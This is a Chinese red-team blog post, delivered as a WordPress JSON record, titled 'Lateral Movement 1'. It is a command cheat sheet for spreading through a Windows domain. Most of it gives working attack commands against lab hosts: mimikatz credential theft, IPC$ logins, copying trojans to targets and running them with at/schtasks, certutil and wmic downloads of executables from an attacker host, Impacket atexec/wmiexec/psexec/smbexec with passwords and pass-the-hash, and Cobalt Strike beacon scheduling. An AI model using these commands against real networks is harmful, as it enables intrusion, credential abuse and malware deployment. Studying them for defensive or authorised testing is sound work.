{"id":68,"date":"2024-03-01T10:00:00","date_gmt":"2023-04-20T02:00:00","guid":{"rendered":"http:\/\/123.207.45.199\/index.php\/2023\/04\/20\/%e6%a8%aa%e5%90%91%e7%a7%bb%e5%8a%a81\/"},"modified":"2026-05-31T21:58:51","modified_gmt":"2026-05-31T13:58:51","slug":"%e6%a8%aa%e5%90%91%e7%a7%bb%e5%8a%a81","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2024\/03\/01\/%e6%a8%aa%e5%90%91%e7%a7%bb%e5%8a%a81\/","title":{"rendered":"\u6a2a\u5411\u79fb\u52a81"},"content":{"rendered":"\n

\u6d41\u7a0b:<\/p>\n\n\n\n

\u8fdb\u5165\u57df\u4e3b\u673a=>\tA 192.168.43.xx\t192.168.3.xx\t=>\u63d0\u6743<\/p>\n\n\n\n

\u5e38\u89c4\u4fe1\u606f\u7c7b(\u5e94\u7528&\u670d\u52a1&\u6743\u9650)\t=>\tsysteminfo\t ipconfig \/all net time \/domain\t<\/p>\n\n\n\n

\u67b6\u6784\u4fe1\u606f\u7c7b(\u7f51\u7edc&\u7528\u6237&\u57df\u63a7)\t=>\tnet user \/domain\tnet localgroup administrators<\/p>\n\n\n\n

\u5173\u952e\u4fe1\u606f\u7c7b(\u5bc6\u7801&\u51ed\u8bc1&\u53e3\u4ee4)\t=>\twin->mimikatz\tlinux->mimipenguin<\/p>\n\n\n\n

\u626b\u63cf\u7aef\u53e3\u5185\u5bb9=>\u9700\u9ad8\u6743\u9650 proxychain+nmap<\/p>\n\n\n\n

\u5de5\u5177: adfind,bloodhound,cs\u63d2\u4ef6<\/p>\n\n\n\n

IPC 139 445\t\tWMIC 135\t\tpsTool 445\t \tSMB 445<\/p>\n\n\n\n

\u8865:<\/p>\n\n\n\n

-\u5185\u7f51\u7a7f\u900f\uff1a\u89e3\u51b3\u7f51\u7edc\u63a7\u5236\u4e0a\u7ebf&\u7f51\u7edc\u901a\u8baf\u95ee\u9898<\/p>\n\n\n\n

SPP&NPS&FRP&Ngrok\u96c6\u5408<\/p>\n\n\n\n

-\u96a7\u9053\u6280\u672f\uff1a\u89e3\u51b3\u4e0d\u51fa\u7f51\u534f\u8bae\u4e0a\u7ebf\u7684\u95ee\u9898\uff08\u5229\u7528\u51fa\u7f51\u534f\u8bae\u8fdb\u884c\u5c01\u88c5\u51fa\u7f51\uff09<\/p>\n\n\n\n

ICMP DNS\u57df\u540d\u89e3\u6790\tssh smb<\/p>\n\n\n\n

-\u4ee3\u7406\u6280\u672f\uff1a\u89e3\u51b3\u7f51\u7edc\u901a\u8baf\u4e0d\u901a\u7684\u95ee\u9898\uff08\u5229\u7528\u8df3\u677f\u673a\u5efa\u7acb\u8282\u70b9\u540e\u7eed\u64cd\u4f5c\uff09<\/p>\n\n\n\n

proxifier\tsockscap\tproxy chains(linux)<\/p>\n\n\n\n

\u603b\u7ed3:<\/p>\n\n\n\n

IPC\t\u901a\u4fe1\u673a\u5236\t\u542f\u7528\u6587\u4ef6\u548c\u6253\u5370\u673a\u5171\u4eab\t\u4e0d\u540c\u8fdb\u7a0b\u6216\u4e0d\u540c\u8ba1\u7b97\u673a\u4e4b\u95f4\u8fdb\u884c\u901a\u4fe1\u548c\u6570\u636e\u4ea4\u6362\t139 445<\/p>\n\n\n\n

MIC\tPC\u673a\u5236\t\u7528\u4e8e\u4e0d\u540c\u8fdb\u7a0b\u4e4b\u95f4\u7684\u901a\u4fe1\t135<\/p>\n\n\n\n

PSTOOL\tSMB\u670d\u52a1\t445<\/p>\n\n\n\n

SMB\t\u4e00\u79cd\u7f51\u7edc\u901a\u4fe1\u534f\u8bae\t445<\/p>\n\n\n\n

\u57fa\u7840\u4fe1\u606f\u83b7\u53d6<\/h3>\n\n\n\n
\u5224\u65ad\u57df\u63a7 shell net time \/domain\n\n\u5b9a\u4f4d\u57df\u63a7  shell ping god.org\n\n\u57df\u63a7\u6210\u5458\u4fe1\u606f\tnet user \/domain\n\n\u626b\u63cf\u7aef\u53e3\u5185\u5bb9=>\u9700\u9ad8\u6743\u9650 proxychain+nmap\n\u83b7\u53d6\u5bc6\u7801=>hash<\/code><\/pre>\n\n\n\n
\u653b\u51fb\u673a\u8fd0\u884c=>\u9700\u8981\u4ee3\u7406<\/p>\n\n\n\n
\u4e0a\u4f20\u6587\u4ef6\u5230\u8df3\u8f6c\u673a->\u8fd0\u884c<\/p>\n\n\n\n
IPC 139 445<\/p>\n\n\n\n
WMIC \t135<\/p>\n\n\n\n
psTool \t445<\/p>\n\n\n\n
SMB \t445<\/p>\n\n\n\n
\u7cfb\u7edf\u81ea\u5e26<\/p>\n\n\n\n
impacket\u5957\u4ef6<\/h4>\n\n\n\n
IPC<\/h4>\n\n\n\n
\u662f\u4ec0\u4e48\uff1f\nIPC\u662f\u4e13\u7528\u7ba1\u9053\uff0c\u53ef\u4ee5\u5b9e\u73b0\u5bf9\u8fdc\u7a0b\u8ba1\u7b97\u673a\u7684\u8bbf\u95ee\uff0c\nIPC(Inter-Process Communication):IPC\u662f\u4e00\u79cd\u5728\u64cd\u4f5c\u7cfb\u7edf\u6216\u7f51\u7edc\u73af\u5883\u5dfe\uff0c\u7528\u4e8e\u4e0d\u540c\u8fdb\u7a0b\u6216\u4e0d\u540c\u8ba1\u7b97\u673a\u4e4b\u95f4\u8fdb\u884c\u901a\u4fe1\u548c\u6570\u636e\u4ea4\u6362\u7684\u673a\u5236\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528IPC\u901a\u4fe1\u673a\u5236\uff0c\u5728\u5185\u7f51\u4e2d\u7684\u4e0d\u540c\u4e3b\u673a\u4e4b\u95f4\u4f20\u9012\u6076\u610f\u4ee3\u7801\u6216\u6267\u884c\u547d\u4ee4\uff0c\u4ece\u800c\u5728\u76ee\u6807\u7f51\u7edc\u4e2d\u5b9e\u73b0\u6a2a\u5411\u79fb\u52a8\u3002\n\n\u670d\u52a1\u5982\u4f55\u5f00\uff1f\n\u63a7\u5236\u9762\u677f--\u7f51\u7edc\u548c\u5171\u4eab\u4e2d\u5fc3--\u914d\u7f6e\u9ad8\u7ea7\u5171\u4eab\u8bbe\u7f6e--\u542f\u7528\u6587\u4ef6\u548c\u6253\u5370\u673a\u5171\u4eab--\u5230\u6307\u5b9a\u76ee\u5f55\u4e0b\u53bb\u8bbe\u7f6e\u5171\u4eab\u6743\u9650\n\n\u5982\u4f55\u7528\u670d\u52a1\u5b9e\u73b0\u79fb\u52a8\uff1f\n\u9700\u8981\u4f7f\u7528\u76ee\u6807\u7cfb\u7edf\u7528\u6237\u7684\u8d26\u53f7\u5bc6\u7801\uff0c\u4f7f\u7528139\u3001445\u7aef\u53e3\u3002\n1,\u5efa\u7acbIPC\u94fe\u63a5\u5230\u76ee\u6807\u4e3b\u673a\n2,\u62f7\u8d1d\u8981\u6267\u884c\u7684\u547d\u4ee4\u811a\u672c\u5230\u76ee\u6807\u4e3b\u673a\n3.\u67e5\u770b\u76ee\u6807\u65f6\u95f4\uff0c\u521b\u5efa\u8ba1\u5212\u4efb\u52a1(at\u3001schtasks)\u5b9a\u65f6\u6267\u884c\u62f7\u8d1d\u5230\u7684\u811a\u672c\n4.\u5220\u9664IPC\u94fe\u63a5<\/code><\/pre>\n\n\n\n
\u5e38\u7528\u547d\u4ee4<\/p>\n\n\n\n
net use\u67e5\u770b\nnet use \\\\ip\\ipc$\"password\" \/user:username #\u5de5\u4f5c\u7ec4\nnet use \\\\ip\\ipcs \"password\"\/user:domain\\username #\u57df\u5185 \n\u4f8b\u5982 net use \\\\192.168.3.32\\ipc$ \"admin!@#45\" \/user:god.org\\dbadmin\nnet view ip\t\t\u67e5\u770b\u6587\u4ef6\u5171\u4eab\ndir \\\\ip\\\\C$\\\n\nshell net use  * \/delete \/yes\t#\u5220\u9664\u8fde\u63a5<\/code><\/pre>\n\n\n\n
\u624b\u5de5                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <\/h5>\n\n\n\n
\u8fde\u63a5\u6d4b\u8bd5\n\n\u6728\u9a6c\u4e0a\u7ebf\u51c6\u5907\n\n\u4f20\u8f93\u6728\u9a6c\/\u8fd0\u884c\u4e0a\u7ebf\n\u62f7\u8d1d\u6728\u9a6c\u6587\u4ef6\u5230\u76ee\u6807\u673a\u5668 \u9700\u8981\u9ad8\u6743\u9650\ncopy  1.exe \\\\192.168.3.32\\C$\\\ncopy  sql.exe \\\\192.168.3.32\\C$\\\n\n\u5229\u7528at\u547d\u4ee4\u4e0a\u7ebf(\u4f4e\u7248\u672c windows\u4f4e\u4e8e2012)\n#\u6dfb\u52a0\u8ba1\u5212\u4efb\u52a1\u8fd0\u884c\u6307\u5b9a\u7a0b\u5e8f\nat \\\\<\u6307\u5b9aIP><\u6307\u5b9a\u65f6\u95f4>c:\\\u6728\u9a6c\nat \\\\192.168.3.31 1:45 c:\\sql.exe\n\n\u5229\u7528schtasks\u547d\u4ee4\u4e0a\u7ebf(\u4f4e\u7248\u672c windows\u4f4e\u4e8e2012)\n\u5176\u4e2d192.168.3.32\u4e3a\u76ee\u6807ip\tAdministrator\u4e3a\u76ee\u6807\u7528\u6237\u540d\tAdmin12345\u4e3a\u76ee\u6807\u5bc6\u7801\tbeacona\u4e3a\u8ba1\u5212\u4efb\u52a1\u540d\tc:\\sql.exe\u4e3a\u8ba1\u5212\u4efb\u52a1\u6267\u884c\u7a0b\u5e8f\u8def\u5f84\n\n#\u521b\u5efabeacon\u4efb\u52a1\u5bf9\u5e94\u6267\u884c\u6587\u4ef6\nschtasks \/create \/s 192.168.3.32 \/u Administrator \/p \"Admin12345\" \/ru \"SYSTEM\" \/tn beacona \/sc DAILY \/tr c:\\sql.exe \/F \n#\u8fd0\u884cbeacon\u4efb\u52a1 \nshell schtasks \/run \/s 192.168.3.32 \/u Administrator \/p \"Admin12345\" \/tn beacona \/i\n#\u5220\u9664beacon\u4efb\u52a1\nschtasks \/delete \/s 192.168.3.32 \/u Administrator \/p \"Admin12345\" \/tn beacona \/f<\/code><\/pre>\n\n\n\n
\u6b63\u5411\u8fde\u63a5=>\u540c\u4e0a (\u4e0a\u4f20\u6728\u9a6c\u5230\u8df3\u677f\u673a=>\u590d\u5236\u5230\u9776\u673a=>at\u547d\u4ee4\u6267\u884c\u6728\u9a6c=>connect ip port)<\/p>\n\n\n\n
\u63d2\u4ef6LSTARS<\/h5>\n\n\n\n
\u7528\u6cd5\u4e0e\u624b\u5de5\u540c\u6837cs<\/p>\n\n\n\n
Impacket(atexec)<\/h5>\n\n\n\n
\u8be5\u5de5\u5177\u662f\u4e00\u4e2a\u534a\u4ea4\u4e92\u7684\u5de5\u5177\uff0c\u9002\u7528\u4e8eWebshell\u4e0b\uff0cSocks\u4ee3\u7406\u4e0b\uff1b\n\u5728\u6e17\u900f\u5229\u7528\u4e2d\u53ef\u4ee5\u6536\u96c6\u7528\u6237\u540d\u3001\u660e\u6587\u5bc6\u7801\u3001\u5bc6\u7801hash\u3001\u8fdc\u7a0b\u4e3b\u673a\u7b49\u505a\u6210\u5b57\u5178\uff0c\u6279\u91cf\u6d4b\u8bd5<\/code><\/pre>\n\n\n\n
py\u7248<\/p>\n\n\n\n
python3 -m pip install impacket\n\u5bc6\u7801\u8fde\u63a5\npython atexec.py <\u7528\u6237\u540d\u6709\u57df\u540d\u9700\u586b\u57df\u540d>\uff1a<\u5bc6\u7801>@<IP>\"<\u8981\u6267\u884c\u7684\u547d\u4ee4>\"\npython atexec.py god.org\/administrator:Admin12345@192.168.3.32\u00a0\"whoami\"\n\nhash\u8fde\u63a5\npython atexec.py -hash:<hash\u503c> .\/administrator@192.168.3.21 \"whoami\"<\/code><\/pre>\n\n\n\n
exe\u7248\u672c<\/p>\n\n\n\n
\u5c06atexec.exe\u6587\u4ef6\u4e0a\u4f20\u5230\u8df3\u677f\u673a\nshell atexec.exe \/administrator:Admin12345@192.168.3.21 \"whoami\"<\/code><\/pre>\n\n\n\n
\u4e0a\u7ebf*<\/p>\n\n\n\n
\u4e0a\u4f20\u6728\u9a6c\u5230\u7f51\u9875=>\u4e0b\u8f7d\u6728\u9a6c=>\u6267\u884c\u6728\u9a6c<\/p>\n\n\n\n
https:\/\/forum.ywhack.com\/bountytips.php?download\n\n1.\u4e0a\u4f20\u6728\u9a6c\u6587\u4ef6aa.exe\u5230\u9776\u673a\u7f51\u9875\tC:\\inetpub\\wwwroot\n\n2.\u5c06\u4e0a\u65b9whoami\u66ff\u6362\u4e3a\u4ee5\u4e0b\t=>\u4e0b\u8f7d\u6728\u9a6c\tC:\\Windows\\System32\ncertutil.exe -urlcache -split -f http:\/\/192.168.3.31:80\/aa.exe bb.exe\n\n3.\u6267\u884c\u6728\u9a6c\twhoami\u76f4\u63a5\u66ff\u6362\u4e3abb.exe<\/code><\/pre>\n\n\n\n
MIC<\/h4>\n\n\n\n
MIC(Microsoft Windows Inter-Process Communication):MIC\u662fMicrosoft windows\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u4e00\u79cdPC\u673a\u5236\uff0c\u7528\u4e8e\u4e0d\u540c\u8fdb\u7a0b\u4e4b\u95f4\u7684\u901a\u4fe1\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5229\u7528MIC\u6f0f\u6d1e\u6216\u5f31\u70b9\uff0c\u5c06\u6076\u610f\u4ee3\u7801\u6ce8\u5165\u5230\u5176\u4ed6\u8fdb\u7a0b\u4e2d\uff0c\u5e76\u5728\u5185\u7f51\u4e2d\u4f20\u64ad\u548c\u6a2a\u5411\u79fb\u52a8\u3002<\/code><\/pre>\n\n\n\n
wmic(\u5355\u6267\u884c\u65e0\u56de\u663e)     <\/h5>\n\n\n\n
WMIC\u662f\u901a\u8fc7135\u7aef\u53e3\u8fdb\u884c\u5229\u7528\uff0c\u652f\u6301\u7528\u6237\u540d\u660e\u6587\u6216\u8005hash\u7684\u65b9\u5f0f\u8fdb\u884c\u8ba4\u8bc1\uff0c\n\u5e76\u4e14\u8be5\u65b9\u6cd5\u4e0d\u4f1a\u5728\u76ee\u6807\u65e5\u5fd7\u7cfb\u7edf\u7559\u4e0b\u75d5\u8ff9\u3002\n\u4e0b\u8f7d:\nwmic \/node:192.168.3.32 \/user:administrator \/password:Admin12345 process call create \"cmd.exe \/c certutil -urlcache -split -f http:\/\/192.168.3.31\/sql.exe c:\/mic.exe\"\n\u8fd0\u884c:\nwmic \/node:192.168.3.32 \/user:administrator \/password:Admin12345 process call create \"cmd.exe \/c c:\/mic.exe\"<\/code><\/pre>\n\n\n\n
cscript(\u4fee\u590d\u65e0\u56de\u663e)<\/h5>\n\n\n\n
\u8fd9\u4e2a\u65e0\u6cd5\u5728CS\u91cc\u9762\u53bb\u7528\u3002\u56e0\u4e3a\u56de\u663e\u7684\u9776\u673acd\u7a97\u53e3\u7b49\u5f85\u4f60\u7684\u547d\u4ee4\u4f20\u8f93\u65f6\u3002CS\u4f1a\u5361\u6b7b<\/p>\n\n\n\n
\u9700\u8981\u80fd\u4e0e\u8df3\u677f\u673a\u684c\u9762\u4ea4\u4e92=>wmiexec.vbs <\/p>\n\n\n\n
cscript \/\/nologo c:\/wmiexec.vbs \/shell 192.168.3.32 administrator Admin12345<\/code><\/pre>\n\n\n\n
Impacket(wmiexec)<\/h5>\n\n\n\n
cs\u65e0\u6cd5\u8fd0\u884c?=>\u653b\u51fb\u673a\u4f7f\u7528proxifier\u4ee3\u7406 \u4f7f\u7528<\/p>\n\n\n\n
wmiexec .\/administrator:admin!@#45@192.168.3.32 \"whoami\"\nwmiexec -hashes :518b98ad4178a53695dc997aa02d455c .\/administrator@192.168.3.32 \"whoami\"\n\n\u4e0b\u8f7d\u6728\u9a6c\nwmiexec .\/administrator:admin!@#45@192.168.3.32 \"cmd.exe \/c certutil.exe -urlcache -split -f http:\/\/192.168.3.31\/sql.exe c:\/113.exe\"\n\n\u8fd0\u884c\u6728\u9a6c\nwmiexec .\/administrator:admin!@#45@192.168.3.32 \"cmd.exe  \/c c:\/113.exe\"<\/code><\/pre>\n\n\n\n
psTool<\/h4>\n\n\n\n
\u5229\u7528SMB\u670d\u52a1\u53ef\u4ee5\u901a\u8fc7\u660e\u6587\u6216hash\u4f20\u9012\u6765\u8fdc\u7a0b\u6267\u884c\uff0c\u6761\u4ef6445\u670d\u52a1\u7aef\u53e3\u5f00\u653e\u3002<\/p>\n\n\n\n
PSTOOL(Sysinternals PsTools):PSTOOL\u662f\u4e00\u5957\u7531sysinternals\u5f00\u53d1\u7684windows\u7cfb\u7edf\u7ba1\u7406\u5de5\u5177\u96c6\u5408\uff0c\u5176\u4e2d\u5305\u62ec\u591a\u4e2a\u547d\u4ee4\u884c\u5b9e\u7528\u7a0b\u5e8f\u3002\u8fd9\u4e9b\u5de5\u5177\u63d0\u4f9b\u4e86\u8bb8\u591a\u529f\u80fd\uff0c\u5305\u62ec\u8fdc\u7a0b\u6267\u884c\u547d\u4ee4\u3001\u8fdb\u7a0b\u7ba1\u7406\u548c\u6587\u4ef6\u4f20\u8f93\u7b49\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528PSTO0L\u6765\u5728\u5185\u7f51\u4e2d\u6267\u884c\u547d\u4ee4\u3001\u63a7\u5236\u8fdc\u7a0b\u4e3b\u673a\u548c\u4f20\u8f93\u6076\u610f\u6587\u4ef6\uff0c\u4ee5\u5b9e\u73b0\u6a2a\u5411\u79fb\u52a8\u548c\u653b\u51fb\u3002<\/code><\/pre>\n\n\n\n
psTool(win\u5b98\u65b9\u81ea\u5e26)<\/h5>\n\n\n\n
\u65e0\u6cd5\u4ee3\u7406=>\u9700\u8981\u7ba1\u7406\u5458\u6743\u9650\u4ee5\u53ca\u684c\u9762\u4ea4\u4e92\npsexec64 \\\\192.168.3.32\\ -u administrator -p admin!@#45 -s cmd <\/code><\/pre>\n\n\n\n
\u5957\u4ef6Impacket(psexec)<\/h5>\n\n\n\n
\u6709\u56de\u663e,\u53efhash,\u53ef\u4ee5\u4ee3\u7406<\/p>\n\n\n\n
\u540e\u53ef\u76f4\u63a5\u63a5\u547d\u4ee4 \"\"\n\u660e\u6587\npsexec .\/administrator:admin!@#45@192.168.3.32\nhash\npsexec -hashes :518b98ad4178a53695dc997aa02d455c .\/administrator@192.168.3.32<\/code><\/pre>\n\n\n\n
cs\u63d2\u4ef6(psexec)<\/h5>\n\n\n\n
\u76ee\u6807\u5217\u8868=>\u9700\u8981\u4e0a\u7ebf\u7684\u4e3b\u673a=>\u6a2a\u5411\u79fb\u52a8(psexec)=>\u76d1\u542c\u5668\u4e3a\u8df3\u677f\u76d1\u542c\u5668|\u4f1a\u8bdd\u9009\u62e9\u8df3\u677fip system<\/code><\/pre>\n\n\n\n
SMB<\/h4>\n\n\n\n
\u5229\u7528SMB\u670d\u52a1\u53ef\u4ee5\u901a\u8fc7\u660e\u6587\u6216hash\u4f20\u9012\u6765\u8fdc\u7a0b\u6267\u884c\uff0c\u6761\u4ef6445\u670d\u52a1\u7aef\u53e3\u5f00\u653e\u3002<\/p>\n\n\n\n
SMB(Server Message B1ock):SMB\u662f\u4e00\u79cd\u7f51\u7edc\u901a\u4fe1\u534f\u8bae\uff0c\u7528\u4e8e\u5728\u8ba1\u7b97\u673a\u7f51\u7edc\u4e2d\u5171\u4eab\u6587\u4ef6\u3001\u6253\u5370\u673a\u548c\u5176\u4ed6\u8d44\u6e90\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5229\u7528SMB\u534f\u8bae\u7684\u5f31\u70b9\uff0c\u6267\u884c\u8fdc\u7a0b\u547d\u4ee4\u548c\u6587\u4ef6\u5171\u4eab\uff0c\u4ece\u800c\u5728\u5185\u7f51\u4e2d\u79fb\u52a8\u548c\u4f20\u64ad\u6076\u610f\u8f6f\u4ef6\u3002<\/code><\/pre>\n\n\n\n
services\u5185\u7f6e\u5229\u7528:(\u5355\u6267\u884c)<\/h5>\n\n\n\n
1.\u521b\u5efa\u670d\u52a1\nservices -hashes 518b98ad4178a53695dc997aa02d455c .\/administrator:@192.168.3.32 create name shell -display shellexec -path C:\\windows\\System32\\shel1.exe\n2,\u542f\u52a8\u670d\u52a1\nservices -hashes 518b98ad4178a53695dc997aa02d455c.\/administrator:@192.168.3.32 start name shell<\/code><\/pre>\n\n\n\n
impacket(smbexec)<\/h5>\n\n\n\n
smbexec .\/administrator:admin!@#45@192.168.3.32<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u6d41\u7a0b: \u8fdb\u5165\u57df\u4e3b\u673a=> A 192.168.43.xx 192.168.3.xx =>\u63d0\u6743 \u5e38\u89c4\u4fe1\u606f\u7c7b(\u5e94\u7528& … <\/p>\n","protected":false},"author":3,"featured_media":69,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-68","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/68","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=68"}],"version-history":[{"count":3,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/68\/revisions"}],"predecessor-version":[{"id":134,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/68\/revisions\/134"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/69"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=68"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=68"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=68"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}